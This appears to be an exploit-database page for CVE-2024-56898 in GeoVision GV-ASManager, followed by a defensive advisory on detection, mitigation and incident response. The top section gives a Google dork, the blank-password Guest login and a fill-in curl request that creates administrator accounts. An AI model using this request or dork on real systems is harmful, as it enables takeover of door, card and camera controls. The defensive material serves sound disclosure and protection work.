GeoVision GV-ASManager 6.1.0.0 - Broken Access Control

Exploit Author: Giorgi Dograshvili Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Shell Published Date: 2025-04-11 
# Exploit Title: Broken Access Control in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56898
# PoC: https://github.com/DRAGOWN/CVE-2024-56898


Broken access control vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.

Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)

Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low privilege account which isn't authorized to manage accounts is able to:
- Enable and disable any account.
- Create new accounts.
- Modify privileges of any account.
- Listing accounts and their information.
After the escalation of the privileges, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization.

cURL script:

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: [SET-TARGET]' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Accept-Language: en-US,en;q=0.9' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: cross-site' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=0, i' -H $'Connection: keep-alive' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 111' \
    -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
    --data-binary $'action=UA_SetCreateAccount&id=[SET-USERNAME]&password=[SET-PASSWORD]&email=[SET-MAIL]&level=[SET-PRIVILEGE 1-STANDARD USER/2-ADMINISTRATOR]' \
    $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'

After a successful attack, you will get access to:
- ASWeb- Access & Security Management 
- TAWeb- Time and Attendance Management 
- VMWeb- Visitor Management 
- ASManager - Access & Security Management software in OS


GeoVision GV-ASManager 6.1.0.0 — Broken Access Control (CVE-2024-56898)

This article explains the broken access-control vulnerability tracked as CVE-2024-56898 in GeoVision GV‑ASManager (v6.1.0.0 and earlier). It focuses on what the vulnerability is, the potential impact, safe detection and monitoring techniques, and practical, defensive mitigations you can apply to protect devices and networks. The guidance below is written for defenders and system owners; it avoids exploit details and instead emphasizes remediation and incident response.

Summary

GV‑ASManager is an Access & Security Management platform used for controlling doors, visitor management, time & attendance, and integrated video monitoring. CVE‑2024‑56898 is a server-side broken access-control issue where a low‑privilege account (for example, a default or guest account) can perform account-management actions that should be restricted to administrators. Exploitation requires network access to the web interface and access to a low‑privilege account (guest accounts are often enabled by default).

Why this is critical

  • Broken access control allows privilege escalation from low‑privilege accounts to administrator-level control without proper authorization checks.
  • Successful compromise can expose or alter sensitive security systems (monitoring cameras, access cards, parking, employee records) and disrupt operations.
  • Attackers can create accounts, change privileges, and persist within the environment — enabling broader lateral movement and fraud.

High-level technical nature (non-actionable)

At a high level, this vulnerability is the result of insufficient server-side authorization checks on account-management functionality. The server accepts requests from authenticated low‑privilege sessions and performs privileged actions without verifying whether the caller has administrative rights. The result is the ability to_List or manipulate accounts and privileges_ from unprivileged sessions.

Potential impacts and attack scenarios

  • Unauthorized creation of administrative accounts or elevation of existing accounts.
  • Disabling legitimate accounts to lock out administrators.
  • Access to monitoring camera feeds, visitor logs, and employee data.
  • Tampering with access control data (card numbers, door schedules) enabling physical intrusion.
  • Persistence and lateral movement inside a secure environment, possibly tying in with other vulnerabilities to extract cleartext secrets.

Detection and risk assessment (safe methods)

1) Inventory and exposure assessment

  • Identify all deployed instances of GV‑ASManager in your network. Use asset inventory and network discovery tools in read‑only or authenticated scan mode.
  • Check whether web management interfaces are reachable from the internet. If the interface is intended to be internal only, verify firewall/NAT rules and cloud security groups to reduce exposure.

2) Verify default/guest accounts and credentials

Confirm whether the Guest or any default low‑privilege accounts are enabled and whether they have weak or blank credentials. This is a valid, low‑risk check for administrators and should be performed via the product’s management UI or documented configuration procedures — not via aggressive probing from external networks.

3) Log and event detection

Monitor for indicators of unauthorized account modification, including sudden account creation, privilege changes, or unexpected administrative activity from non‑admin accounts. Use centralized logging to capture web server access logs and application logs for forensic inspection.


# Example (Splunk) conceptual query to find POST activity to ASManager web paths in the last 30 days
index=network_logs source=web_access 
| where uri_path like "%/ASWeb/%" and method="POST"
| stats count by src_ip, user, uri_path, http_status

The query above is a defensive example to surface POST requests to ASManager‑related paths. Adjust the index and fields for your logging environment. The goal is to flag unusual POST activity, especially from accounts that should not be performing administrative actions.

Mitigation and remediation (recommended)

1) Apply vendor fixes

  • Check GeoVision support channels and apply the latest security updates/patches immediately. Vendor patches are the primary remediation for a server‑side authorization flaw.
  • If a formal patch is not yet available, follow vendor guidance and temporary mitigations issued by GeoVision.

2) Disable or harden default/guest accounts

  • Disable the Guest/default accounts if they are not required.
  • Enforce strong passwords and avoid blank passwords for any account.
  • Use unique credentials per instance and rotate administrative passwords regularly.

3) Restrict network access to management interfaces

Limit access to web administration interfaces to trusted management networks and jump hosts only. Use IP allowlists for management traffic and block public access to admin endpoints.


# NGINX configuration snippet (defensive) to restrict management path to internal networks
location ^~ /ASWeb/ {
    allow 10.0.0.0/8;
    allow 192.168.0.0/16;
    deny all;
}

This NGINX snippet prevents access to the /ASWeb/ path from outside the allowed subnets. Adjust CIDR blocks to match your management network range. Deploying such rules on perimeter/web-proxy devices reduces internet exposure.


# Windows PowerShell example to allow only a management subnet to reach HTTP(S) on a server
# Allow management subnet
New-NetFirewallRule -DisplayName "Allow ASManager ManagementSubnet" `
  -Direction Inbound -Protocol TCP -LocalPort 80,443 `
  -RemoteAddress 10.0.0.0/24 -Action Allow

# Block other inbound HTTP(S)
New-NetFirewallRule -DisplayName "Block ASManager External" `
  -Direction Inbound -Protocol TCP -LocalPort 80,443 -RemoteAddress Any -Action Block

These commands are defensive examples. Ensure rules are applied in the correct order and that legitimate management access is not blocked accidentally.

4) Web Application Firewall (WAF) and access controls

  • Configure WAF rules to require valid session cookies or block management‑oriented POST requests coming from untrusted networks.
  • Rate‑limit and fingerprint suspicious traffic patterns to administrative endpoints.

# Conceptual ModSecurity rule (example; adapt for your environment)
SecRule REQUEST_METHOD "POST" "chain,deny,status:403,msg:'Block suspicious admin POST from external'"
  SecRule REQUEST_URI "@beginsWith /ASWeb/" "chain"
  SecRule REMOTE_ADDR "!@ipMatch 10.0.0.0/8 192.168.0.0/16"

The ModSecurity example denies POSTs to management URIs originating outside trusted subnets. Tailor the rule to match your deployment and test in monitoring mode before enforcing.

5) Principle of least privilege and authentication hardening

  • Ensure administrative functions are accessible only to accounts that require them.
  • Enable multi‑factor authentication (MFA) for privileged accounts where supported.
  • Audit role assignments and remove unnecessary privileges.

Monitoring and detection best practices

  • Collect and retain web access logs, application logs, and security events from GV‑ASManager for at least 90 days (or per your policy).
  • Create alerting rules for: account creations, privilege escalations, account disables, and administrative logins from new hosts or unusual geolocations.
  • Correlate application events with network flows to detect lateral movement or exfiltration attempts.

Incident response checklist

  • Isolate the affected host from the network or restrict access to management subnet immediately.
  • Collect forensic artifacts: application logs, system event logs, web server logs, and a memory snapshot if practical.
  • Rotate all credentials that could have been compromised, including service accounts, administrator accounts, and integration credentials.
  • Inspect system configuration for unauthorized changes (new admin accounts, modified privileges, network changes).
  • Restore to a known-good state from trusted backups when necessary and validate integrity before re‑exposure.
  • Engage GeoVision support for vendor advisories and follow their remediation guidance.

Compliance, risk prioritization, and long‑term strategies

Prioritize remediation according to exposure and business impact: internet‑facing management interfaces and installations in high‑security facilities should be patched or mitigated first. Consider network segmentation, dedicated management VLANs, centralized authentication (e.g., RADIUS, SAML where supported), and regular security assessments for physical access control systems that integrate with IT infrastructure.

Patch status table (example)

Affected versionRiskRecommended action
GV‑ASManager v6.1.0.0 or earlierHighApply vendor patch or mitigations; restrict network access; disable guest/default accounts
Patched versions (vendor-supplied)Lower (after patch)Verify patch applied, monitor logs, rotate credentials

Responsible disclosure and staying informed

  • Subscribe to GeoVision security advisories and CVE feeds to receive official patch and mitigation information.
  • Coordinate with your vendor support channel for guidance tailored to your deployment and to validate remediation.

Final notes

Broken access control in security management systems is particularly dangerous because it can directly affect physical security controls and monitoring systems. Rapidly apply vendor patches, reduce exposure of management interfaces, enforce strong authentication, and maintain continuous monitoring to reduce the attack surface and detect abuse early.